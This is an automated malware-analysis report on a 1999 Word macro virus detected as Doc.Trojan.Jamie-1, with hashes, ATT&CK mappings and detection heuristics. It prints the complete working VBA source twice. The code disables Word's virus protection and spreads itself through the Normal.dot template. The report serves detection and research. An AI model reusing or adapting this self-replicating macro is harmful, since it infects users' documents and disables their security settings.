Office (OLE) malware analysis — malicious · ed9f795192e56d8c

MALICIOUS

Office (OLE)

40.5 KB Created: 1999-05-28 02:45:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 11afc7c42b7087b49fb78ee1286cc6de SHA-1: be91b23f5bc06a5f3dd6ee5bb26623359752104c SHA-256: ed9f795192e56d8ce28bfe77796f2a9ef4c770c3e3f65e2fbae6d0bf5f268a0f

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a Microsoft Word document containing VBA macros. The macros are designed to modify the Normal.dot template, potentially to establish persistence or spread to other documents. The script explicitly mentions 'Jamie(AD)' and 'Lys KovicK', and the file metadata indicates it was created in 1999, suggesting it is an older piece of malware. The 'Document_Open' and 'Document_Close' subroutines are used to manipulate the template's code.

Heuristics 3

ClamAV: Doc.Trojan.Jamie-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Jamie-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1801 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1801 bytes
SHA-256: `13cad7cd199f6fefd3368dabd077e6ad3edfc503cf5aa2bf3bc2a057bffdb473`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Close() SetAttr NormalTemplate.FullName, vbNormal Options.VirusProtection = (0 - 0): Options.SaveNormalPrompt = (1 - 1): Options.ConfirmConversions = (2 - 2) Set AD = ActiveDocument.VBProject.VBComponents.Item(1) Set NT = NormalTemplate.VBProject.VBComponents.Item(1) If ActiveDocument.VBProject.Description <> "For Jamie..." Then GoTo ADI If NormalTemplate.VBProject.Description <> "For Jamie..." Then GoTo NTI GoTo SetReadOnly ADI: Set MTI = AD Set MTC = NT OPM = "Private Sub Document_Close()" AII = AD.CodeModule.CountOfLines ActiveDocument.VBProject.Description = "For Jamie..." GoTo Install NTI: Set MTI = NT Set MTC = AD OPM = "Private Sub Document_Open()" AII = NT.CodeModule.CountOfLines NormalTemplate.VBProject.Description = "For Jamie..." GoTo Install Install: If AII > 0 Then With MTI.CodeModule For x = 1 To AII .DeleteLines 1 Next End With End If If AII <= 1 Then MTC.Export ("Jamie.tmp") MTI.CodeModule.AddFromFile ("Jamie.tmp") For x = 1 To MTI.CodeModule.CountOfLines If MTI.CodeModule.Find("Private Sub Document", 1, 1, 1, 20, True, True, True) = False Then MTI.CodeModule.DeleteLines 1 Next MTI.CodeModule.ReplaceLine 1, OPM Kill ("Jamie.tmp") End If SetReadOnly: SetAttr NormalTemplate.FullName, vbReadOnly ActiveDocument.SaveAs FileName:=ActiveDocument.FullName End Sub ',.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,., ' Jamie(Type A - Strand D) By Lys KovicK ' Released: Thursday, May 27, 1999, 20:10 '';';';';';';';';';';';';';';';';';';';';'

SHA-256: 13cad7cd199f6fefd3368dabd077e6ad3edfc503cf5aa2bf3bc2a057bffdb473

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
SetAttr NormalTemplate.FullName, vbNormal
Options.VirusProtection = (0 - 0): Options.SaveNormalPrompt = (1 - 1): Options.ConfirmConversions = (2 - 2)
Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
If ActiveDocument.VBProject.Description <> "For Jamie..." Then GoTo ADI
If NormalTemplate.VBProject.Description <> "For Jamie..." Then GoTo NTI
GoTo SetReadOnly
ADI:
Set MTI = AD
Set MTC = NT
OPM = "Private Sub Document_Close()"
AII = AD.CodeModule.CountOfLines
ActiveDocument.VBProject.Description = "For Jamie..."
GoTo Install
NTI:
Set MTI = NT
Set MTC = AD
OPM = "Private Sub Document_Open()"
AII = NT.CodeModule.CountOfLines
NormalTemplate.VBProject.Description = "For Jamie..."
GoTo Install
Install:
If AII > 0 Then
 With MTI.CodeModule
  For x = 1 To AII
  .DeleteLines 1
  Next
 End With
End If
If AII <= 1 Then
 MTC.Export ("Jamie.tmp")
 MTI.CodeModule.AddFromFile ("Jamie.tmp")
  For x = 1 To MTI.CodeModule.CountOfLines
   If MTI.CodeModule.Find("Private Sub Document", 1, 1, 1, 20, True, True, True) = False Then MTI.CodeModule.DeleteLines 1
  Next
  MTI.CodeModule.ReplaceLine 1, OPM
 Kill ("Jamie.tmp")
End If
SetReadOnly:
SetAttr NormalTemplate.FullName, vbReadOnly
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
',.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,
' Jamie(Type A - Strand D) By Lys KovicK
' Released: Thursday, May 27, 1999, 20:10
'';';';';';';';';';';';';';';';';';';';';'

Open this report in the interactive analyzer, or submit your own file for analysis.